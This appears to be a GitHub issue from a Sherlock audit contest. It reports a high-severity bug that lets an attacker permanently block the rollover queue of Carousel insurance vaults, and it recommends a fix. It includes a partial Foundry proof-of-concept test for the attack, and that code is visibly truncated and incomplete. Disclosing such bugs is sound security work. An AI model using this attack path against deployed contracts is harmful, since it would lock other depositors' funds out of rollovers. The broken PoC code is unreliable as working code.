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toshii - Attacker can cause permanent denial of service, blocking all rollovers indefinitely #202

sherlock-admin opened this issue Mar 27, 2023 · 0 comments
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sherlock-admin commented Mar 27, 2023



Attacker can cause permanent denial of service, blocking all rollovers indefinitely


An attacker can cause permanent denial of service of the rollover queue and block all rollovers indefinitely for a trivial cost, breaking core protocol functionality. This allows the attacker to reduce the number of deposits in their vault, allowing them to earn more if there is a payout.

Vulnerability Detail

An attacker who is deposited in either the collateral vault or the premium vault is able to perform a permanent denial of service attack on the rollover queue, allowing them to prevent all calls to the mintRollovers(..) function from succeeding. This means that users will be able to enlist in the rollover queue, which will give them the false belief that their funds will rollover into the next epoch. However, the attacker can cause the mintRollovers(..) to always revert by breaking the fundamental invariant laid out in the code: // @note we know shares were locked up to this point. Specifically, the attacker can trick the rollover queue into accepting an entry where the assets are greater than the entire balance of the user for a given epochId. This will result in the _burn(..) call done in mintRollovers(..) to revert. Since mintRollovers(..) always starts looping from index=0, there is no way to avoid this malicious entry in the rollover queue.

The attacker is financially incentivized to break the behavior of the rollover queue for the vault type (premium or collateral) that they are depositing in, because that will result in their own deposits making up a larger portion of the vault, thus they will receive more funds in the event of a payout. This will also cause harm to the depositors in the adjacent vault type, as they will either be getting less insurance or less premiums. Additionally, users are still able to successfully call the enlistInRollover(..) function, meaning they will not know their funds are not being automatically rolled over, unless they are actively viewing their position.

Referenced lines of code:


This is high severity because the attacker is able to permanently disable the rollover queue for trivial cost and a small number of actions taken only once. With this, the attacker is able to financially benefit while screwing over other users, and at the same time breaking core protocol functionality.

Code Snippet

POC including preliminary state and steps (foundry test):

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

// utilities
import {Test} from "forge-std/Test.sol";
import {console} from "forge-std/console.sol";

// project files
import {TokenMock} from "src/my-tests/TokenMock.sol"; // simple ERC20 token w/ minting
import {WETH} from "src/my-tests/WETH.sol"; // WETH mock
import {OracleMock} from "src/my-tests/OracleMock.sol"; // mock oracle

import {Carousel} from "src/v2/Carousel/Carousel.sol";
import {CarouselFactory} from "src/v2/Carousel/CarouselFactory.sol";
import {ControllerPeggedAssetV2} from "src/v2/Controllers/ControllerPeggedAssetV2.sol";

contract TestPermanentDOS is Test {
    // protocol users
    address admin = makeAddr('admin'); // project admin
    address attacker1 = makeAddr('attacker1'); // attacker addresses
    address attacker2 = makeAddr('attacker2');
    address user1 = makeAddr('user1'); // other user addresses
    address user2 = makeAddr('user2');
    address user3 = makeAddr('user3');

    WETH weth;
    TokenMock emissionsToken;
    OracleMock sequencerFeed;
    OracleMock priceFeed;

    CarouselFactory carouselFactory;
    ControllerPeggedAssetV2 controllerPeggedAssetV2;
    Carousel premiumVault;
    Carousel collateralVault;
    uint256 epochId1;
    uint256 epochId2;
    uint256 marketId;

    /// configuring starting state for showing bug/exploit
    function setUp() public {, 100 ether);, 100 ether);,100 ether);,100 ether);,100 ether);

        vm.startPrank(admin); // admin setting up starting project state
        vm.warp(10_000); // to mock that sequencer is up

        weth = new WETH();
        emissionsToken = new TokenMock();,10_000e18); // admin is used as treasury

        carouselFactory = new CarouselFactory(

        sequencerFeed = new OracleMock();
        sequencerFeed.setData(1,0,0,0,1); // sequencer is up

        priceFeed = new OracleMock();
        priceFeed.setData(1,1e8,0,0,1); // setting price for asset, decimals=8

        controllerPeggedAssetV2 = new ControllerPeggedAssetV2(


        // creating a new market:
        CarouselFactory.CarouselMarketConfigurationCalldata memory config = 
                token: address(1), // arbitrary, just for lookup to oracle
                strike: 99e17,
                oracle: address(priceFeed),
                underlyingAsset: address(weth),
                name: "name",
                tokenURI: "tokenURI",
                controller: address(controllerPeggedAssetV2),
                relayerFee: 10000,
                depositFee: 250

        (address premium, address collateral, uint256 _marketId) = carouselFactory.createNewCarouselMarket(config);
        marketId = _marketId;
        premiumVault = Carousel(premium);
        collateralVault = Carousel(collateral);

        // creating the first two epochs, with the first one beginning and the second one queued:

        (epochId1,) = carouselFactory.createEpochWithEmissions(
            uint40(block.timestamp+10), // epochBegin
            uint40(block.timestamp+20), // epochEnd

        vm.warp(block.timestamp+10); // epoch 1 has started

        // 10 timestamp gap between the first epoch and the second epoch
        (epochId2,) = carouselFactory.createEpochWithEmissions(
            uint40(block.timestamp+20), // epochBegin
            uint40(block.timestamp+30), // epochEnd

        // first epoch resolved with nullEpoch as there are no deposits

    /// showcasing the bug/exploit
    function testPermanentDOS() public {

        // showcasing the ability of any user to completely shut down the mintRollovers(..) function which
        // will effectively deactivate the entire rollover functionality causing a permanent denial of service. 
        // to perform this permanent denial of service, the attacker will trick the rolloverQueue into having
        // an entry where the `assets` for that `epochId` will be greater than the balance of assets that
        // the attacker has, therefore causing the _burn(..) function call to revert. As mintRollovers(..)
        // will always loop through the queue starting at index=0, all calls will revert indefinitely 

        // other user deposits funds into the premium vault

        // attacker crafts transactions to get an entry which has `assets` > their actual balance (attacker is using two addresses for this attack)
        // i am showing the simplest method, however there is another potential attack vector to perform this as well

        // attacker first has both accounts deposit funds in the collateral vault
        // attacker has both accounts enlist in the rollover queue
        // attacker tricks the rolloverQueue into including an entry where `assets` > their actual balance
        vm.prank(attacker1); // after this the `assets` for attacker2 > their actual balance

        // showing that this invariant has been broken, will later demonstrate the DOS
        (uint256 assets_,address receiver_,uint256 epochId_) = collateralVault.rolloverQueue(1);

        // simulating some additional normal behavior
        // another normal user deposits into epoch 2 in the collateral vault & adds to rollover queue

        vm.warp(block.timestamp+20); // second epoch has started

        // create the third epoch
        (uint256 epochId3,) = carouselFactory.createEpochWithEmissions(
            uint40(block.timestamp+20), // epochBegin
            uint40(block.timestamp+30), // epochEnd

        vm.warp(block.timestamp+11); // second epoch has ended

        // epoch 2 has ended, trigger end of the epoch

        // showcasing the denial of service, any future call to mintRollovers(..) will always revert
        // this effectively renders the rollover queue unusable indefinitely


Tool used

Manual Review


In my POC i have shown the easiest attack path that I have found that results in this denial of service behavior, but I believe I may have found another attack path, albeit more complex, that will result in the same behavior. Because of this finding, I believe the simplest way to prevent this particular bug is to ensure that: queue[index].assets <= balanceOf(queue[index].receiver, queue[index].epochId). To do this in practice, mintRollovers(..) should not reference queue[index].assets directly, but rather store and use a variable equivalent to the smaller of queue[index].assets and the balance of the user: uint256 thisUsersAssets = min(queue[index].assets, balanceOf(queue[index].receiver,queue[index].epochId)); // pseudocode.

However, this fix is obviously just a last resort safety measure, and all attack paths which can lead to the // @note we know shares were locked up to this point invariant being broken should be patched. Assuming they are, then the patch I have outlined will not be necessary.

Duplicate of #2

@github-actions github-actions bot closed this as completed Apr 3, 2023
@github-actions github-actions bot added High A valid High severity issue Duplicate A valid issue that is a duplicate of an issue with `Has Duplicates` label labels Apr 3, 2023
@sherlock-admin sherlock-admin added the Reward A payout will be made for this issue label Apr 11, 2023
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